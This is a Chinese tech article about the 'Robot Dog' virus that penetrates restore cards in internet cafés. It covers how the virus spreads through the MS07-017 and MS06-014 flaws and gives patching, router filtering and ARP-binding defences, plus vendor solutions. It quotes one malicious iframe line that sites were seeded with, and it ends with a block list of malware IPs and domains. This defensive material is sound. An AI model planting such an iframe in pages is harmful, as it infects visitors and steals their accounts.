【IT168 专稿】最近一段时间,可以穿透市场上各种硬件还原卡,以及各种还原软件的"机器狗"病毒肆虐横行,着实让国内各网吧的网管忙活了一阵子。对于疯狂的"机器狗"病毒,杀毒软件厂商和一些硬件厂商也推出了解决方案,但收效甚微,不少网管同行戏称"机器狗"病毒的横行为网吧又一浩劫。从技术角度讲,再疯狂的病毒,也会有弱点,"机器狗"病毒也不例外,只要全面布防,消灭"机器狗"病毒并不难。
要想消灭"机器狗"病毒,必须对该病毒的历史及工作原理有一个非常全面的了解,这样才能找到防范方法。下面,我们来看一下"机器狗"病毒的历史和工作原理。
机器狗病毒终于让它趴下啦!(附:防arp攻击,防穿透,防疫和查毒程序)
"机器狗"病毒的产生原理
"机器狗"病毒的工作原理,首先通过pcihdd.sys驱动文件抢占还原软件的硬盘控制权,并修改用户初始化文件userinit.exe来实现隐藏自身的目的。由于病毒自动保存在系统中后,会定期从指定的网站下载各种木马程序,以截取上网用户的网络游戏帐号信息,为此,从技术角度讲,"机器狗"病毒被称为一个典型的网络架构木马型病毒。
最初,网吧的电脑感染了"机器狗"病毒之后,会威胁用户的帐号安全,因为病毒会自动下载一些盗号木马。不久之后,"机器狗"病毒有了新变种,该变种可以自动下载ARP欺骗病毒。更重要的是, "机器狗"病毒的新变种会对userinit.exe进行加密,并且对userinit.exe进行了加壳处理,使病毒具有更强的隐蔽性,致使一些防疫补丁对于"机器狗"的新变种失去了防范作用。
截至目前,"机器狗"病毒仍有新的变种产生。一个新变种的产生,则意味着部分防范措施将失效,如何防范"机器狗"病毒成为困扰网管的一个大难题。要想消灭"机器狗"病毒,必须仔细研究该病毒的各个变种,找出病毒的传播途径和弱点,这也是消灭该病毒需要努力的方向。
从"机器狗"形成查找病毒弱点
可以破坏还原卡或还原软件,这并不是"机器狗"病毒最具破坏力的地方,诡秘的传播方式,以及感染之后自动下载病毒制造者所定制的木马程序,这才是"机器狗"的罪大恶极之处。
在传播途径上,杀毒软件厂商经过研究后发现,"机器狗"病毒的传播主要是利用系统或应用软件的漏洞进行的。下面,笔者一一列举可以为"机器狗"病毒传播提供便捷通道的系统漏洞和应用软件漏洞。
MS07-017漏洞:最初,"机器狗"病毒是利用下面一段代码进行传播的,代码内容如下:<iframe src="http://xx.exiao01.com/2.htm" width="20" height="1" frameborder="0"></iframe>
病毒作者会将上述代码植入到各大网站中。查看被调用的2.htm的内容不难发现,病毒利用了操作系统的ANI漏洞加载木马,而这一过程恰恰是对微软操作系统MS07-017漏洞的"巧妙"应用。如果网吧机器没有安装MS07-017补丁,一旦访问了病毒代码,"机器狗"病毒便会不请自来。
MS06-014漏洞:这个漏洞是很多网管都熟悉的一个系统漏洞,即IE自动下载。如果系统存在该漏洞的话,一旦计算机访问到带有"机器狗"病毒代码的网页,会利用IE浏览器的自动下载并执行的漏洞,就这样,"机器狗"病毒就在计算机中安营扎寨。
在网吧的应用环境中,通过IE浏览器上网是每台计算机都有的操作,这无疑加大了感染"机器狗"病毒的机率。由于"机器狗"病毒是通过恶意代码进行传播的,也就是说,凡是可以执行网页代码的应用软件,都有可能成为"机器狗"病毒的传播渠道。
细数网吧的各种应用软件,影音播放软件也是"机器狗"病毒的一大传播通道。众所周知,不少病毒作者会将病毒代码植入影音文件中,一旦用户使用诸如Realplayer等支持网页浏览的播放软件,病毒代码就会被执行,计算机将会感染病毒。Realplayer播放器、百度搜霸、PPStream播放器,以及迅雷客户端,都是"机器狗"病毒传播可以利用的通道。
在实际应用中,如果能够利用技术手段切断"机器狗"病毒的传播,病毒自然不会去破坏网吧的还原系统,更不会自动下载木马程序。显然,要想消灭"机器狗"病毒,必须设法切断病毒的传播途径,这也是该病毒所谓的弱点。
根据"机器狗"病毒弱点制订防范方案
在对"机器狗"病毒的防范方案中,现有的很多方案都是想尽一切办法,阻止"机器狗"病毒破坏还原系统,阻止病毒下载木马程序,而这恰恰是一个误区。举个例子来说,消灭病毒,尤如清除田间的杂草一样;现有的一些"机器狗"免疫程序,尤如清除杂草的镰刀;不可否认,我们用镰刀可以暂时清除田间的杂草,春风一吹,杂草又坚强的从地下钻出来。为此,要想消息"机器狗"病毒,必须切断传播途径这条"根"。
对于网管而言,只要禁止恶意代码感染网吧的计算机,"机器狗"病毒就不会进入网吧电脑作恶。就网吧的环境而言,掐断"机器狗"的传播途径,除了补好系统的漏洞之外,还要充分利用硬件设备的功能,过滤带有恶意代码的网站,只有层层设防,才能最大限度的掐断病毒传播途径。
第一道防线:软件防范篇
说白了,"机器狗"病毒是一个程序,也是一种具有破坏力和传染性的软件。加之"机器狗"病毒是利用系统及应用软件的漏洞进行传播的,补好这些漏洞,意味着可以将病毒拒之门外。对于"机器狗"病毒的软件防范方案,具体做法如下:
1、及时更新系统漏洞补丁:从上文的叙述可以得知,网吧计算机之所以会感染"机器狗"病毒,因为操作系统和一些应用软件存在着诸多的安全漏洞,为此,网管必须在第一时间内安装操作系统和应用软件的安全补丁。
网吧使用的是微软的操作系统,默认情况下,操作系统的自动更新功能是打开的,一旦微软发布新的安全补丁,自动更新功能将会自动安装这些安全补丁。对于诸如Realplayer等应用软件的安全漏洞,建议网管定期升级,一旦软件厂商推出了新版本,及时将网吧电脑的各种应用软件更新到最新的版本。
2、安装"机器狗"病毒免疫程序:为了抑制"机器狗"病毒的传播,一些杀毒软件厂商推出了免疫程序,网吧用户可以在计算机中安装此程序,防范病毒入侵。需要引起网吧网管高度注意的是,一些"机器狗"的免疫程序,也有失效期,因为病毒作者也在不断对病毒进行升级。一旦"机器狗"病毒升级,现有的免疫程序将会失效,网管必须安装最新的免疫程序才能防范"机器狗"病毒的入侵。
3、及时更新病毒库:"机器狗"病毒入侵计算机的过程,其实是通过一个含有恶意代码网页进行传播的过程。对于一些恶意代码,杀毒软件是有查杀能力的。为此,要想准确的查杀带有"机器狗"病毒的恶意网页代码,必须及时更新病毒库。
对于11月以前的"机器狗"病毒,软件防范方案是非常有效的。对于最新的"机器狗"病毒变种,部分软件防范方案是无效的,而且很难从源头上杜绝"机器狗"病毒。对于最新的"机器狗"病毒变种,不仅要做好软件防范方案,还需要做好硬件防范方案。更重要的是,最新的"机器狗"病毒变种,除了自动下载盗号木马程序之外,还会下载ARP欺骗病毒,这种情况下,硬件防范方案就显得尤为重要了。
第二道防线:硬件防范篇
对于可以自动下载ARP欺骗病毒的"机器狗"病毒最新变种来说,软件防范方案显得有点力不从心。加之ARP欺骗的防范,需要在路由器或交换机上进行相应的安全设置,为此,消灭"机器狗"病毒还需要制订相应的硬件防范方案。
就网吧的应用环境而言,针对"机器狗"病毒的硬件防范方案,一是通过路由器对"机器狗"病毒的传播途径屏蔽;二是防范ARP病毒对网吧网络的破坏,这也是硬件防范方案的重点。具体来说,针对"机器狗"病毒的硬件防范方案主要有以下几个方面:
1、用IP地址过滤列表屏蔽"机器狗"传播途径:"机器狗"病毒的传播,是因为用户点击了带有恶意代码的网页,网管可以将其屏蔽,这样就封堵了"机器狗"病毒的传播渠道。屏蔽一些恶意网站,可以通过网吧的路由器中都自带防火墙组件完成。启用路由器防火墙组件中的IP地址过滤列表和域名过滤列表功能,将一些传播"机器狗"病毒的恶意网站域名及IP进行屏蔽,方法相信大多数网管都已经掌握。
2、建立协议端口过滤列表:感染了"机器狗"病毒的机器,自动下载木马程序时,会占用一定的网络端口。从技术角度上讲,如果把病毒下载木马程序所占用的端口禁用,病毒将无法下载木马程序。为此,在了解了"机器狗"病毒下载木马程序占用的网络端口之后,可以通过路由器的防火墙组件,建立协议端口过滤列表,将病毒使用的端口禁用。
3、绑定IP和MAC地址:最新的"机器狗"病毒变种可以自动下载ARP欺骗病毒,这无疑让"机器狗"病毒的破坏力更加强大。对于ARP欺骗的防范,网管可以通过网吧的路由器或三层交换机等网络设备,将每台客户机的IP与MAC地址做一个绑定;除此之外,在客户机中,将网关的IP地址与MAC地址做一个绑定。通过双层绑定,降低ARP欺骗的危害。
针对"机器狗"病毒新变种的硬件防范方案,很大程度上要受限于路由器或三层交换机功能的限制。由于"机器狗"软件防范方案有一定的局限,硬件方案可以弥补软件防范方案的局限,软硬兼施,消灭"机器狗"病毒也成为可能。
总结:来势凶凶的"机器狗"病毒严重干扰了网吧的正常运营,如何消灭"机器狗"病毒也困扰着诸多网管们。由于"机器狗"病毒涉及到网络传播和操作系统底层驱动,要想真正消灭顽劣的"机器狗"病毒,网管只能从硬件和软件两方面入手,全面防范,单纯的硬件或软件防范方案对于"机器狗"病毒的防范作用是微弱的。
附一:厂商解决方案纵览
在"机器狗"病毒肆虐网吧之时,各大网络设备厂商纷纷推出了相应的解决方案,应对"机器狗"病毒。
第一:锐捷
锐捷分析:所谓"联动方案",即通过使用NBR2000路由器和锐捷网吧交换机协同作战。从研究的结果来看,中了IGM或机器狗病毒的机器绝大部分会自动下载ARP病毒,对内网的其它机器进行ARP扫描和欺骗。所以说,我们只需要准确判断出哪台机器中了ARP病毒,就可以知道哪台机器中了IGM或机器狗病毒(已确认内网机器存在IGM或机器狗病毒的情况下)。
第二:艾泰
艾泰分析:对于arp欺骗,艾泰科技推荐在路由器和内网PC双向绑定的基础上,再加入支持端口mac绑定的交换机来彻底解决该类问题。
另外对于无法配置固定IP,只能使用DHCP自动获得IP的客户,艾泰最新VSTART软件通过计划任务可以实现对该类主机自动进行ARP绑定,待该IP租约到期未续租时则自动解除其ARP绑定,这样当路由器收到内网虚假的ARP信息时就会拒绝。我们还可以在HiPER上开启ARP广播,该功能使HiPER在一定的频率内发送申明自己的ARP广播包(免费ARP),从而使客户机学习到正确的路由ARP信息。
附二:目前已知的病毒网址
59.34.198.103
58.51.62.182
58.211.254.103
60.190.118.211
60.190.223.117
60.190.222.150
60.190.222.235
60.190.203.150
60.191.124.236
61.152.101.128
202.104.57.161
218.83.175.154
219.153.55.113
221.130.191.207
www.tomwg.com
Yu.8s7.net
www.17max.cn
www.951ksf.com
www.pp365.com
www.111ss.com
www.11se.com
www.joppnqq.com
www.77886699.cn
www.94ak.com
www.99mmm.com
www.161816.com
www.91ni.com
www.35832.com
www.15197.com